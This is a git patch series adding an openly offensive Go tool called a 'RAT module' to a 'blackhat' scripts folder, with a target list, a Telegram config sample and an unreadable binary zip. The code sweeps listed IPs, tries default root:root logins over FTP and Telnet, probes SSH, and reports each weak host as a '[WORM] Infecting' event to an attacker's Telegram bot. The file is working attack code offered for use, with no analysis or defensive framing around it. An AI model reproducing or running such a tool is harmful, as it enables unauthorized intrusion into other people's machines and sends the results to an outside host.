From 7d6f4ab7280e1f1fa5541ac25046af12f5c4173e Mon Sep 17 00:00:00 2001
From: Michel666-def <m.ophof@protonmail.com>
Date: Fri, 13 Jun 2025 15:15:28 +0200
Subject: [PATCH 1/2] Add files via upload

Add RAT module with SSH/FTP/Telnet bruteforce and Telegram integration
---
 package/blackhat/scripts/config_sample.json |   4 +
 package/blackhat/scripts/rat.go             | 111 ++++++++++++++++++++
 package/blackhat/scripts/targets.txt        |   1 +
 3 files changed, 116 insertions(+)
 create mode 100644 package/blackhat/scripts/config_sample.json
 create mode 100644 package/blackhat/scripts/rat.go
 create mode 100644 package/blackhat/scripts/targets.txt

diff --git a/package/blackhat/scripts/config_sample.json b/package/blackhat/scripts/config_sample.json
new file mode 100644
index 0000000..f66da18
--- /dev/null
+++ b/package/blackhat/scripts/config_sample.json
@@ -0,0 +1,4 @@
+{
+  "telegram_token": "PASTE_YOUR_TOKEN_HERE",
+  "telegram_chat_id": "PASTE_YOUR_CHAT_ID_HERE"
+}
\ No newline at end of file
diff --git a/package/blackhat/scripts/rat.go b/package/blackhat/scripts/rat.go
new file mode 100644
index 0000000..9f000a7
--- /dev/null
+++ b/package/blackhat/scripts/rat.go
@@ -0,0 +1,111 @@
+package main
+
+import (
+    "fmt"
+    "net"
+    "os"
+    "os/exec"
+    "strings"
+    "time"
+    "bytes"
+    "net/http"
+    "encoding/json"
+)
+
+type Config struct {
+    TelegramToken string `json:"telegram_token"`
+    TelegramChat  string `json:"telegram_chat_id"`
+}
+
+func readConfig() Config {
+    var cfg Config
+    file, err := os.ReadFile("config.json")
+    if err == nil {
+        json.Unmarshal(file, &cfg)
+    }
+
+    // Fallback to environment variables
+    if token := os.Getenv("TELEGRAM_TOKEN"); token != "" {
+        cfg.TelegramToken = token
+    }
+    if chat := os.Getenv("TELEGRAM_CHAT_ID"); chat != "" {
+        cfg.TelegramChat = chat
+    }
+
+    return cfg
+}
+
+func sendTelegramMessage(cfg Config, msg string) {
+    url := fmt.Sprintf("https://api.telegram.org/bot%s/sendMessage", cfg.TelegramToken)
+    data := []byte(fmt.Sprintf("chat_id=%s&text=%s", cfg.TelegramChat, msg))
+    http.Post(url, "application/x-www-form-urlencoded", bytes.NewBuffer(data))
+}
+
+func worm(ip string) {
+    sendTelegramMessage(readConfig(), "[WORM] Infecting " + ip)
+}
+
+func trySSH(ip string) {
+    conn, err := net.DialTimeout("tcp", ip+":22", 3*time.Second)
+    if err == nil {
+        conn.Close()
+        sendTelegramMessage(readConfig(), "[SSH] Open SSH @ "+ip+" (try root:root)")
+        worm(ip)
+    }
+}
+
+func tryFTP(ip string) {
+    conn, err := net.DialTimeout("tcp", ip+":21", 3*time.Second)
+    if err == nil {
+        defer conn.Close()
+        conn.Write([]byte("USER root\r\n"))
+        conn.Write([]byte("PASS root\r\n"))
+        buf := make([]byte, 1024)
+        conn.SetReadDeadline(time.Now().Add(3 * time.Second))
+        n, _ := conn.Read(buf)
+        banner := string(buf[:n])
+        if strings.Contains(banner, "230") || strings.Contains(banner, "Login") {
+            sendTelegramMessage(readConfig(), "[FTP] Weak login @ "+ip)
+            worm(ip)
+        }
+    }
+}
+
+func tryTelnet(ip string) {
+    conn, err := net.DialTimeout("tcp", ip+":23", 3*time.Second)
+    if err == nil {
+        defer conn.Close()
+        conn.Write([]byte("root\n"))
+        time.Sleep(1 * time.Second)
+        conn.Write([]byte("root\n"))
+        buf := make([]byte, 1024)
+        conn.SetReadDeadline(time.Now().Add(3 * time.Second))
+        n, _ := conn.Read(buf)
+        banner := string(buf[:n])
+        if strings.Contains(banner, "Last login") || strings.Contains(banner, "$") {
+            sendTelegramMessage(readConfig(), "[TELNET] Weak login @ "+ip)
+            worm(ip)
+        }
+    }
+}
+
+func loadTargets() []string {
+    data, err := os.ReadFile("targets.txt")
+    if err != nil {
+        return []string{}
+    }
+    lines := strings.Split(string(data), "\n")
+    return lines
+}
+
+func main() {
+    cfg := readConfig()
+    targets := loadTargets()
+    for _, ip := range targets {
+        go trySSH(ip)
+        go tryFTP(ip)
+        go tryTelnet(ip)
+    }
+    sendTelegramMessage(cfg, fmt.Sprintf("[RAT] Finished sweep of %d targets.", len(targets)))
+    time.Sleep(15 * time.Second)
+}
\ No newline at end of file
diff --git a/package/blackhat/scripts/targets.txt b/package/blackhat/scripts/targets.txt
new file mode 100644
index 0000000..67f42d4
--- /dev/null
+++ b/package/blackhat/scripts/targets.txt
@@ -0,0 +1 @@
+192.168.0.10\n192.168.0.23
\ No newline at end of file

From 7234800d6b421747e217f2bb8288957f642ff536 Mon Sep 17 00:00:00 2001
From: Michel666-def <m.ophof@protonmail.com>
Date: Fri, 13 Jun 2025 21:05:30 +0200
Subject: [PATCH 2/2] Add files via upload

---
 rat_protocol_impl.zip | Bin 0 -> 1573 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 rat_protocol_impl.zip

diff --git a/rat_protocol_impl.zip b/rat_protocol_impl.zip
new file mode 100644
index 0000000000000000000000000000000000000000..faa408c072609dccfe5a55761f4f6fd90abfc650
GIT binary patch
literal 1573
zcmZ`(J!~5{6jow41JN;4v%H==NP%^N+@whbq=ozwM=%-*mVuxN42izu-LdA82a*^0
zQe?=`DMQhEY8#*(f~;Ay1;~=AYp0@vR}W2=j6okyss+o+NtEu6kKg;=_dc?>wXk@x
z;;vUe|9Q9bZujt8ym#Xh9Gcoerj=EJ5(A!QqOq5A5&9-s`n0jfWn+(;glu-Z{TqVI
z`~Wt)?d`Q&H>ge_R!{~*T>;`iMhl^6*uZ-~R)htK0`KU_53q`mwgtYM@ks9!q2s%M
z|MdcixbfLsLV=PIj|YY#JLZ39l>D9mc$NtkYnl$M+Go;hf!AF5{L0lYTJ6=f`ufIA
z_Y^0ceNlf<99+G2XXSn~$9HVhY<kNMAV{!w9!^(YyZ+^5W@TWQzR$FqORUXWjYgqz
zT@P03;|V`d={VK|R1Pwwt-)Zcb5>%Hluids(mlak0{5OgoT>bB>*dGC=PDI9F3qic
zd!xPn&4!<bOR(MEf!?G~&~ZwnOj>HWl7#Fe+<<180@TV<E)Cd(LD^SZWDHzmrwc$u
zKw(qWv9~NNp(CZ?rr=q|G^`35?4vf&?fZl*Ey0`LfBU2CVF(>*u$I83HJJB*1GsEx
z7OIODA;aOYG>v~^CHHE=a>RvzKr?C?au7UD?1;Hv7@|3b6BIBxw@y58#6p${Rk(UV
z$$9h+pTV7^z<L?BCF7|1*M!tzi?Pg1<9SMB27*zEbGH>phQ(V2D3_(kYEwCQOLfdF
zMr`LOV?>PwDnnFPa3oYfq*V(2bwFM@dLcp?P@<z>fBE;tkFZu+75b%B3F$Ki!?X4s
zmQ_)}wA!NJ;|Pe5xIg2O_lKR=Z_yiWz+8`<-gFtZ&Q+PB2?)WqqcNe1Zb!dIDQ>><
zP8pBX2#InTl#$gMxGe>MA%0JDX@#tM&T?alq3`=pwa#VurI4XRSfWJ8bj_=kD;o{i
z>8^KMQ*VNUcSfOt+oBBO5y~&C%J^*^n;Lut%}L_3$#W^WjA6uW0@#w4w+xeY_nN!o
zoDa(_b?*Gdg%6)^s9AYEedPYoVjno|dRwP)W{;&YN~QAj(NA-6&USegadx{;5g+3L
maF*H0=AQ+c^~4nD`NBM)(+=rveRRRCSj0~g6aTa5p8f;<K<9w~

literal 0
HcmV?d00001